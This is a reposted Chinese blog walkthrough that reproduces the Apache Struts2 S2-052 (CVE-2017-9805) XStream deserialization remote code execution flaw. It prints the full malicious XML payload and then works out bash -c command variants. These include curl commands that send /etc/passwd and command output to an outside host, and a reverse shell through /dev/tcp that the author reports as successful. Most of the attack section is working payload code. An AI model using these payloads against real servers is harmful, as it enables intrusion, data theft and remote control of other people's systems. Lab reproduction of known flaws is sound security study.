struts2-052-CVE-2017-9805

最新推荐文章于 2024-05-26 09:51:42 发布
最新推荐文章于 2024-05-26 09:51:42 发布
阅读量196 收藏
点赞数
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43718688/article/details/114820584
版权

访问 http://ip:8080/ 即可,能看到如下面这个图,就说明可以了。
在这里插入图片描述
点edit,然后点submit抓包

在数据包里构造POC:

<map>

<entry>

     <jdk.nashorn.internal.objects.NativeString>

       <flags>0</flags>

       <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">

         <dataHandler>

           <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">

             <is class="javax.crypto.CipherInputStream">

               <cipher class="javax.crypto.NullCipher">

                 <initialized>false</initialized>

                 <opmode>0</opmode>

                 <serviceIterator class="javax.imageio.spi.FilterIterator">

                   <iter class="javax.imageio.spi.FilterIterator">

                     <iter class="java.util.Collections$EmptyIterator"/>

                     <next class="java.lang.ProcessBuilder">

                       <command>

<string>touch</string>

<string>/tmp/test.txt</string>

                       </command>

                       <redirectErrorStream>false</redirectErrorStream>

                     </next>

                   </iter>

                   <filter class="javax.imageio.ImageIO$ContainsFilter">

                     <method>

                       <class>java.lang.ProcessBuilder</class>

                       <name>start</name>

                       <parameter-types/>

                     </method>

                     <name>foo</name>

                   </filter>

                   <next class="string">foo</next>

                 </serviceIterator>

                 <lock/>

               </cipher>

               <input class="java.lang.ProcessBuilder$NullInputStream"/>

               <ibuffer/>

               <done>false</done>

               <ostart>0</ostart>

               <ofinish>0</ofinish>

               <closed>false</closed>

             </is>

             <consumed>false</consumed>

           </dataSource>

           <transferFlavors/>

         </dataHandler>

         <dataLen>0</dataLen>

       </value>

     </jdk.nashorn.internal.objects.NativeString>

     <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>

   </entry>

   <entry>

     <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>

     <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>

   </entry>

 </map>

这里要改成application/xml
在这里插入图片描述
发送请求结束,服务器会报错,但是命令应该已经执行成功。
在这里插入图片描述
查看一下本机的/tmp/目录,看是否新生成一个test.txt文件。(由于启动该镜像时,已经将本地的/tmp/目录映射到容器的/tmp/目录,故容器/tmp/目录的变化会反映到本地/tmp/目录)
在这里插入图片描述
如果想执行其他命令,只需要修改之间的值就行了。
随着近一步的测试,郁闷的发现这个地方的payload不能随意写,必需符合某些格式命令才会执行。
1、命令不能直接写到一个中:

<command>
<string>touch /tmp/test.txt</string>
</command>

这样写命令是不会执行的,必须按照空格分开,分别写到

<string></string>

中间才行。例如最开始的正确格式。

2、没法随意创建文件
比如原始命令是:
echo abc > /tmp/abc

转换成对应的格式就是:

<command>

<string>echo</string>

<string>abc</string>

<string>></string>

<string>/tmp/abc</string>

</command>

这样也是不行的,应该是不支持重定向符号>,管道符 | 应该也不支持吧。

3、没有回显
命令执行完了之后,完全看不到执行的结果。比如 ls、pwd、id、whoami、ifconfig ,完全不知道结果是什么。能想到的一个回显办法就是把命令执行结果写到一个文件,然后去读取那个文件。但是由于不支持重定向符号,所以写文件还是个难题……

4、命令可以支持多个参数
原始命令:
cp /etc/passwd /tmp/passwd
转换之后

<command>

<string>cp</string>

<string>/etc/passwd</string>

<string>/tmp/passwd</string>

</command>

cp命令执行成功

原始命令:
curl -d “abc=test” http://x.x.x.x/
转换之后

<command>

<string>curl</string>

<string>-d</string>

<string>abc=test</string>

<string> http://x.x.x.x/ </string>

</command>

curl命令执行成功!注意第三行的值不能有双引号,否则失败。

5、可以文件读取
原始命令:
curl -F “value=@/etc/passwd” http://x.x.x.x/
转换之后

<command>

<string>curl</string>

<string>-F</string>

<string>value=@/etc/passwd</string>

<string> http://x.x.x.x/ </string>

</command>

通过在服务端http://x.x.x.x/抓包,发现/etc/passwd被post了过来。

四、难点与突破
经过上述测试,发现能实现文件读取。假如能把命令的执行结果写到某个文件,就能实现回显。然而臣妾做不到啊……

后来还是想办法绕过对 > | 这些符号的限制,搜了不少资料未果。然后猜想服务端是不是类似一种bash -c 的执行效果,服务端把我们传的参数都拼接起来执行。

然后就开始测试 bash -c这个命令,以下是失败的例子:

<command>

<string>bash</string>

<string>-c</string>

<string>touch</string>

<string>/tmp/abc.txt</string>

</command>

<command>

<string>bash</string>

<string>-c</string>

<string>'<string>

<string>touch</string>

<string>/tmp/abc.txt</string>

<string>'<string>

</command>

<command>

<string>bash</string>

<string>-c</string>

<string>"touch</string>

<string>/tmp/abc.txt”</string>

</command>

<command>

<string>bash</string>

<string>-c</string>

<string>"touch /tmp/abc.txt”</string>

</command>

功夫不负有心人,让我测试到了成功!下面是成功的例子!

创建一个空的 /tmp/abc.txt

<command>

<string>bash</string>

<string>-c</string>

<string>touch /tmp/abc.txt</string>

</command>

可以使用重定向符号>创建任意文件!

<command>

<string>bash</string>

<string>-c</string>

<string>echo abcd >/tmp/abcd.txt</string>

</command>

可以把ip addr的命令执行结果输出到/tmp/ip.txt

<command>

<string>bash</string>

<string>-c</string>

<string>ip addr >/tmp/ip.txt</string>

</command>

可以把ip addr的命令执行结果输出到/tmp/ip.txt,然后把这个ip.txt文件post到指定的服务器,实现了回显。

<command>

<string>bash</string>

<string>-c</string>

<string>ip addr >/tmp/cmd.txt;curl -F "name=@/tmp/cmd.txt" http://x.x.x.x</string>

</command>

使用管道符|

<command>

<string>bash</string>

<string>-c</string>

<string>echo abc|grep abc>/tmp/test.txt</string>

</command>

五、得到反弹shell

最理想的当然就是反弹shell了,我紧接着测试了bash反弹shell的例子。

原始命令

bash -i >& /dev/tcp/x.x.x.x/port 0>&1

转换之后:

<command>

<string>bash</string>

<string>-c</string>

<string>bash -i >& /dev/tcp/x.x.x.x/port 0>&1</string>

</command>

但是没有反弹成功……

刚开始不知道为什么会失败,后来想到可能是&这个符号,因为前面已经证实了这种写法 > | 符号是可以被正确解析的,所以只剩下&符号了。

正郁闷的时候,我发现服务器的错误响应跟前面的是有点不同的。
在这里插入图片描述
通过这个,猜测服务器应该是不认识&这个符号,需要编码。然后我就把&换成 &,再试一次……

<command>

<string>bash</string>

<string>-c</string>

<string>bash -i >& /dev/tcp/x.x.x.x/port 0>&1</string>

</command>

成功了!服务器得到了一个反弹shell,然后想干嘛就可以干嘛了……
在这里插入图片描述转载非原创,侵删

沾了油的水子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2017-9805Struts2 漏洞复现与分析)
4ct10n
09-07 9696
前天发布的新漏洞,以前Struts的漏洞也是经常出,今年三月份就有一次。但这类的洞一直没有跟进,今天也是想着把它给复现一下,同时搭个环境分析一下漏洞形成的原因。0x01 漏洞简介漏洞背景 2017年9月5日,Apache官方发布了一则公告,该公告称Apache Struts2的REST插件存在远程代码执行的高危漏洞,CVE编号为CVE-2017-9805Struts2 REST插件的XStre
struts2-CVE-2017-9805
m0_51369969的博客
07-14 190
REST plugin是Struts2的一个处理传入URL请求的插件。 攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码。漏洞的成因是由于使用XStreamHandler反序列化XStream实例的时候没有执行严格的过滤导致远程代码执行。...
复现S2-052远程代码执行漏洞
weixin_52458793的博客
04-12 175
使用docker搭建vulhub环境(https://vulhub.org/),复现S2-052远程代码执行漏洞
struts2 请求参数大小写_Struts2漏洞系列之「S2-052」REST插件远程执行命令漏洞
weixin_39530647的博客
11-24 188
Smi1e@Pentes7eam漏洞信息:https://cwiki.apache.org/confluence/display/WW/S2-052Struts2使用了 Struts2-Rest-Plugin插件时,如果http请求的Content-type为application/xml,则会使用XStreamHandler解析器实例化XStream对象来反序列化处理我们传入的XML数据,且在...
探索Apache Struts漏洞CVE-2017-9805的解决方案:struts-pwn工具包
最新发布
gitblog_00096的博客
05-26 459
探索Apache Struts漏洞CVE-2017-9805的解决方案:struts-pwn工具包 项目地址:https://gitcode.com/mazen160/struts-pwn_CVE-2017-9805 在这个快速发展的数字时代中,安全问题始终是应用程序开发的核心关注点。Apache Struts作为一款广受欢迎的MVC框架,其安全性直接影响到依赖它的数百万Web应用。然而,就像任何...
Apache Struts2 S2-005 远程代码执行漏洞
m0_63241485的博客
08-20 1513
XWork会将GET参数的键和值利用OGNL表达式解析成Java语句,如:user.address.city=Bishkek&user[‘favoriteDrink’]=kumys//会被转化成触发漏洞就是利用了这个点,再配合OGNL的沙盒绕过方法,组成了S2-003。官方对003的修复方法是增加了安全模式(沙盒),S2-005在OGNL表达式中将安全模式关闭,又绕过了修复方法。整体过程如下:S2-003 使用\u0023绕过s2对#的防御S2-003 后官方增加了安全模式(沙盒)
[Vulfocus解题系列] Struts2-052远程代码执行漏洞(CVE-2017-9805
00勇士王子的博客
07-14 2236
漏洞介绍 名称: struts2-052 远程代码执行 (CVE-2017-9805) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。REST plugin是其中的一个处理传入URL请求的插件。 攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码。漏洞的成因是由于使用XStreamHandler反序列化XStream实例的时候没有执行严
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
CVE-2017-9805-POC.py s2-052.py 批量检测脚本
12-08
Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行...
struts2-scan_struts2-scan_struts2scan_scan_struts2漏洞_
09-29
2017年,一个名为CVE-2017-9805的重大漏洞被发现,它允许远程攻击者通过恶意构造的HTTP请求头注入任意的OGNL表达式,从而执行服务器端代码,这可能导致数据泄露、系统权限提升甚至完全控制服务器。 "struts2-scan...
xalanjava源码-study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-150
06-05
CVE-2017-7525、CVE-2017-15095 调查报告 我们发表了一篇总结文章,只总结了要点,便于阅读。推荐给那些想要获得概览或没有空闲时间的人。 SSTtechlog 08 S2-054、S2-055 和 jackson-databind 漏洞 CVE-2017-7525、...
CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
weixin_33736649的博客
09-06 316
一. 漏洞概述 2017年9月5日,Apache Struts 2官方发布一个严重级别的安全漏洞公告,该漏洞由国外安全研究组织lgtm.com的安全研究人员发现,漏洞编号为CVE-2017-9805(S2-052),在一定条件下,攻击者可以利用该漏洞远程发送精心构造的恶意数据包,获取业务数据或服务器权限,存在高安全风险。 二. 漏洞基本信息...
s2-052漏洞复现利用 CVE-2017-9805
w7deer的博客
04-20 780
S2-052CVE-2017-9805)环境: VulApps/s/struts2/s2-052 at master · Medicean/VulApps · GitHub 访问 http://你的 IP 地址:端口号/ 漏洞poc检测与利用 poc下载: https://github.com/Lone-Ranger/apache-struts-pwn_CVE-2017-9805 检测到漏洞存在: python apache-struts-pwn.py -u 'http://192.1.
Struts2-052复现,并反弹Shell
Becktick的博客
03-31 1258
Struts2-052复现,并反弹Shell 技术无罪,请勿用于恶意用途 转载请注明出处! 测试机:kali linux,win10 工具:burp 靶机:cenOS7 测试机IP:192.168.213.136 靶机IP:192.168.213.138 环境: docker 一. 环境搭建 docker搭建可以参考这位小姐姐的文章: http://bbs.dark5.net/?thread-24...
Struts2远程代码执行漏洞
m0_63241485的博客
08-16 924
进入试验机,打开火狐终端firefox访问我们的靶机所在ip地址。通过whoami与id命令,对当前反弹shell的权限进行判断,这里为linux系统最高权限root用户权限.在Linux操作系统中,root的权限是最高的,也被称为超级权限的拥有者。普通用户无法执行的操作,root用户都能完成,所以也被称之为超级管理用户。在所有Linux系统中,系统都是通过UID来区分用户权限级别的,而UID为0的用户被系统约定为是具有超级权限。...
【S2-052Struts2远程命令执行漏洞(CVE-2017-9805
Unitue_逆流
10-13 5962
**操作机:**Windows 7**目标IP:**172.16.11.2:8080实验工具: Burp Suite:是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架,本次试验主要用到它的抓包改包功能。 Metasploit:一款
Struts2——052CVE-2017-9805)远程代码执行漏洞复现
Stephen Wolf
11-23 1195
一、漏洞描述: 2017年9月5日,Apache Struts官方发布最新的安全公告称,Apache Struts 2.5.x的REST插件存在远程代码执行高危漏洞,漏洞编号为CVE-2017-9805(S2-052),受影响的版本为Struts 2.5 - Struts 2.5.12。攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码。漏洞的成因是由于使用XStre...
程序包com.sun.xml.internal.bind.v2不存在解决
zym1095839105的博客
09-16 9899
程序包com.sun.xml.internal.bind.v2不存在 导入com.sun.xml.internal 下的包并且没使用时打包也会报这个错误 全局搜索 com.sun.xml.internal.bind.v2 删除掉import即可; //我的是 import com.sun.xml.internal.bind.v2.TODO;
CVE-2017-9805漏洞复现
07-27
CVE-2017-9805是Apache Struts 2框架中的一个漏洞,它允许攻击者执行远程代码。这是一个严重的漏洞,如果您担心您的系统受到影响,请立即采取措施进行修复。 建议您遵循以下步骤来保护您的系统: 1. 确认您的系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值